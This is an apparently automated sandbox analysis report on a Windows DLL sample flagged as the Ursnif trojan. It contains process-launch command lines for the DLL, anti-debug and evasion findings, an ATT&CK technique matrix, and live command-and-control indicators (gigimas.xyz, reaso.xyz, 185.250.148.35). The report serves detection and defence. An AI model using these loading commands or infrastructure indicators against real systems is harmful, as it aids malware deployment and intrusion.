          Source: Binary string: gdi32.pdb8 source: WerFault.exe, 0000000B.00000003.396163566.000001716E474000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000B.00000003.395867216.000001716E471000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396822650.000001DFB5E14000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396760863.000001DFB5E11000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: user32.pdb source: WerFault.exe, 0000000B.00000003.395867216.000001716E471000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396760863.000001DFB5E11000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000B.00000003.396118866.000001716E470000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396815765.000001DFB5E10000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: rundll32.pdb8 source: WerFault.exe, 0000000B.00000003.395867216.000001716E471000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396760863.000001DFB5E11000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: .pdbU source: WerFault.exe, 0000000B.00000002.404499737.000001716B9D2000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: rpcrt4.pdb8 source: WerFault.exe, 0000000B.00000003.395867216.000001716E471000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396760863.000001DFB5E11000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000B.00000003.395867216.000001716E471000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396760863.000001DFB5E11000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: imagehlp.pdb8 source: WerFault.exe, 0000000B.00000003.395867216.000001716E471000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396760863.000001DFB5E11000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ntdll.pdb source: WerFault.exe, 0000000B.00000003.390149544.000001716D88A000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000B.00000003.393542297.000001716D88A000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000B.00000003.395867216.000001716E471000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.390425076.000001DFB52CA000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.393721593.000001DFB52CA000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396760863.000001DFB5E11000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: combase.pdb source: WerFault.exe, 0000000B.00000003.395867216.000001716E471000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396760863.000001DFB5E11000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: kernel32.pdb source: WerFault.exe, 0000000B.00000003.390201513.000001716D890000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000B.00000003.392963034.000001716D890000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000B.00000003.395867216.000001716E471000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.390462142.000001DFB52D1000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.393053418.000001DFB52D1000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396760863.000001DFB5E11000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: rundll32.pdb source: WerFault.exe, 0000000B.00000003.390045053.000001716D884000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000B.00000003.389884691.000001716D918000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000B.00000003.395867216.000001716E471000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.390315024.000001DFB52C4000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396760863.000001DFB5E11000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.390223237.000001DFB5359000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: se.pdb source: WerFault.exe, 0000000B.00000002.404499737.000001716B9D2000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000002.404139284.000001DFB33E2000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: msvcrt.pdb8 source: WerFault.exe, 0000000B.00000003.395867216.000001716E471000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396760863.000001DFB5E11000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000B.00000003.395877568.000001716E477000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000B.00000003.396307800.000001716E477000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396853459.000001DFB5E17000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396775988.000001DFB5E17000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ntdll.pdb8 source: WerFault.exe, 0000000B.00000003.395867216.000001716E471000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396760863.000001DFB5E11000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: imagehlp.pdb source: WerFault.exe, 0000000B.00000003.395867216.000001716E471000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396760863.000001DFB5E11000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: win32u.pdb source: WerFault.exe, 0000000B.00000003.396163566.000001716E474000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000B.00000003.395867216.000001716E471000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396822650.000001DFB5E14000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396760863.000001DFB5E11000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: gdi32full.pdb source: WerFault.exe, 0000000B.00000003.396163566.000001716E474000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000B.00000003.395867216.000001716E471000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396822650.000001DFB5E14000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396760863.000001DFB5E11000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: kernel32.pdb8 source: WerFault.exe, 0000000B.00000003.395867216.000001716E471000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396760863.000001DFB5E11000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: user32.pdb8 source: WerFault.exe, 0000000B.00000003.395867216.000001716E471000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396760863.000001DFB5E11000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: dwmapi.pdb source: WerFault.exe, 0000000B.00000003.395877568.000001716E477000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000B.00000003.396307800.000001716E477000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396853459.000001DFB5E17000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396775988.000001DFB5E17000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ntdll.pdb0 source: WerFault.exe, 0000000B.00000003.390149544.000001716D88A000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000B.00000003.393542297.000001716D88A000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.390425076.000001DFB52CA000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.393721593.000001DFB52CA000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: kernelbase.pdb source: WerFault.exe, 0000000B.00000003.392399774.000001716D896000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000B.00000003.395867216.000001716E471000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.390485617.000001DFB52D7000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.392399063.000001DFB52D7000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396760863.000001DFB5E11000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: kernel32.pdb0 source: WerFault.exe, 0000000B.00000003.390201513.000001716D890000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000B.00000003.392963034.000001716D890000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.390462142.000001DFB52D1000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.393053418.000001DFB52D1000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: imm32.pdb source: WerFault.exe, 0000000B.00000003.396118866.000001716E470000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000C.00000003.396815765.000001DFB5E10000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FF88C08B9B0 LoadLibraryA,GetProcAddress,0_2_00007FF88C08B9B0
          Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\pzG0rkIchr.dll

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: Yara matchFile source: Process Memory Space: loaddll64.exe PID: 492, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5172, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 1228, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 400, type: MEMORYSTR
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\System32\loaddll64.exe TID: 5272Thread sleep time: -120000s >= -30000sJump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\rundll32.exeLast function: Thread delayed
          Source: C:\Windows\System32\rundll32.exeAPI coverage: 4.0 %
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FF88C07FB70 FindFirstFileExA,0_2_00007FF88C07FB70
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FF88C07FB70 FindFirstFileExA,3_2_00007FF88C07FB70
          Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FF88C07FB70 FindFirstFileExA,6_2_00007FF88C07FB70
          Source: C:\Windows\System32\loaddll64.exeThread delayed: delay time: 120000Jump to behavior
          Source: C:\Windows\System32\loaddll64.exeAPI call chain: ExitProcess graph end nodegraph_0-10633
          Source: C:\Windows\System32\loaddll64.exeAPI call chain: ExitProcess graph end nodegraph_0-10376
          Source: C:\Windows\System32\loaddll64.exeAPI call chain: ExitProcess graph end nodegraph_0-10371
          Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end node
          Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end node
          Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end node
          Source: C:\Windows\System32\rundll32.exeAPI call chain: ExitProcess graph end node
          Source: C:\Windows\System32\rundll32.exeAPI call chain: ExitProcess graph end node
          Source: C:\Windows\System32\rundll32.exeAPI call chain: ExitProcess graph end node
          Source: rundll32.exe, 00000004.00000003.759039619.0000021DD923C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.564079958.0000021DD923C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.759733313.0000021DD923C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.497353450.0000021DD923C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.694516726.0000021DD923C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.629091178.0000021DD923C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.825208523.0000021DD923C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.432152980.0000021DD923C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.497418075.0000021DD923C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.693778417.0000021DD923C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW\
          Source: WerFault.exe, 0000000C.00000002.404708361.000001DFB5324000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0*K
          Source: WerFault.exe, 0000000B.00000002.405301805.000001716D916000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000B.00000003.403687494.000001716D916000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW</
          Source: WerFault.exe, 0000000B.00000003.401733084.000001716D910000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000B.00000003.401808320.000001716D914000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW</%SystemRoot%\system32\mswsock.dll<reqs>
          Source: rundll32.exe, 00000004.00000003.759039619.0000021DD923C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.564079958.0000021DD923C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.759733313.0000021DD923C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.497353450.0000021DD923C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.694516726.0000021DD923C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.629091178.0000021DD923C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.825208523.0000021DD923C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.432152980.0000021DD923C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.497418075.0000021DD923C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.693778417.0000021DD923C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000B.00000002.404822488.000001716BA98000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: rundll32.exe, 00000004.00000002.824960141.0000021DD91C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FF88C07E374 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF88C07E374
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FF88C08B9B0 LoadLibraryA,GetProcAddress,0_2_00007FF88C08B9B0
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FF88C0711F0 ReadFile,GetProcessHeap,HeapFree,0_2_00007FF88C0711F0
          Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2100 -s 304Jump to behavior
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FF88C086DA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF88C086DA4
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FF88C07E374 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF88C07E374
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FF88C07BC0C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF88C07BC0C
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FF88C086DA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00007FF88C086DA4
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FF88C07E374 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00007FF88C07E374
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FF88C07BC0C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00007FF88C07BC0C
          Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FF88C086DA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00007FF88C086DA4
          Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FF88C07E374 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00007FF88C07E374
          Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00007FF88C07BC0C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00007FF88C07BC0C

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Windows\System32\rundll32.exeNetwork Connect: 185.250.148.35 443Jump to behavior
          Source: C:\Windows\System32\rundll32.exeDomain query: gigimas.xyz
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\pzG0rkIchr.dll",#1Jump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2100 -s 304Jump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1308 -s 304Jump to behavior
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FF88C0865F0 cpuid 0_2_00007FF88C0865F0
          Source: C:\Windows\System32\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FF88C08ED60 CreateNamedPipeA,0_2_00007FF88C08ED60
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FF88C07BB08 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF88C07BB08

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: Process Memory Space: loaddll64.exe PID: 492, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5172, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 1228, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 400, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: Process Memory Space: loaddll64.exe PID: 492, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 5172, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 1228, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 400, type: MEMORYSTR
          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Native API
          1
          DLL Side-Loading
          112
          Process Injection
          1
          Disable or Modify Tools
          OS Credential Dumping1
          System Time Discovery
          Remote Services1
          Archive Collected Data
          Exfiltration Over Other Network Medium12
          Encrypted Channel
          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
          DLL Side-Loading
          21
          Virtualization/Sandbox Evasion
          LSASS Memory31
          Security Software Discovery
          Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
          Non-Application Layer Protocol
          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)112
          Process Injection
          Security Account Manager21
          Virtualization/Sandbox Evasion
          SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
          Application Layer Protocol
          Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
          Regsvr32
          NTDS1
          Remote System Discovery
          Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Rundll32
          LSA Secrets1
          File and Directory Discovery
          SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          DLL Side-Loading
          Cached Domain Credentials13
          System Information Discovery
          VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 752975 Sample: pzG0rkIchr.exe Startdate: 24/11/2022 Architecture: WINDOWS Score: 84 31 Snort IDS alert for network traffic 2->31 33 Antivirus detection for URL or domain 2->33 35 Multi AV Scanner detection for submitted file 2->35 37 Yara detected Ursnif 2->37 7 loaddll64.exe 1 2->7         started        process3 process4 9 cmd.exe 1 7->9         started        11 rundll32.exe 7->11         started        13 rundll32.exe 7->13         started        15 3 other processes 7->15 process5 17 rundll32.exe 9->17         started        21 WerFault.exe 17 9 11->21         started        23 WerFault.exe 11->23         started        25 WerFault.exe 3 9 13->25         started        27 WerFault.exe 13->27         started        dnsIp6 29 gigimas.xyz 185.250.148.35, 443, 49706, 49707 FIRSTDC-ASRU Russian Federation 17->29 39 System process connects to network (likely due to code injection or exploit) 17->39 41 Performs DNS queries to domains with low reputation 17->41 signatures7

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          pzG0rkIchr.dll73%ReversingLabsWin64.Trojan.Tnega
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
          https://sectigo.com/CPS00%URL Reputationsafe
          http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y0%URL Reputationsafe
          http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl00%URL Reputationsafe
          http://ocsp.sectigo.com00%URL Reputationsafe
          https://gigimas.xyz/index.html)I60%Avira URL Cloudsafe
          https://gigimas.xyz0%Avira URL Cloudsafe
          http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
          http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#0%URL Reputationsafe
          http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#0%URL Reputationsafe
          https://gigimas.xyz/ic0%Avira URL Cloudsafe
          https://gigimas.xyz/index.htmlr0%Avira URL Cloudsafe
          https://gigimas.xyz/920%Avira URL Cloudsafe
          https://http://Mozilla/5.00%Avira URL Cloudsafe
          https://gigimas.xyz/index.htmll0%Avira URL Cloudsafe
          https://gigimas.xyz/index.htmluH0%Avira URL Cloudsafe
          https://gigimas.xyzhttps://reaso.xyz0%Avira URL Cloudsafe
          https://gigimas.xyz:443/index.html0%Avira URL Cloudsafe
          https://gigimas.xyz/0%Avira URL Cloudsafe
          https://gigimas.xyz/index.html0%Avira URL Cloudsafe
          https://reaso.xyz100%Avira URL Cloudmalware
          NameIPActiveMaliciousAntivirus DetectionReputation
          gigimas.xyz
          185.250.148.35
          truetrue
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
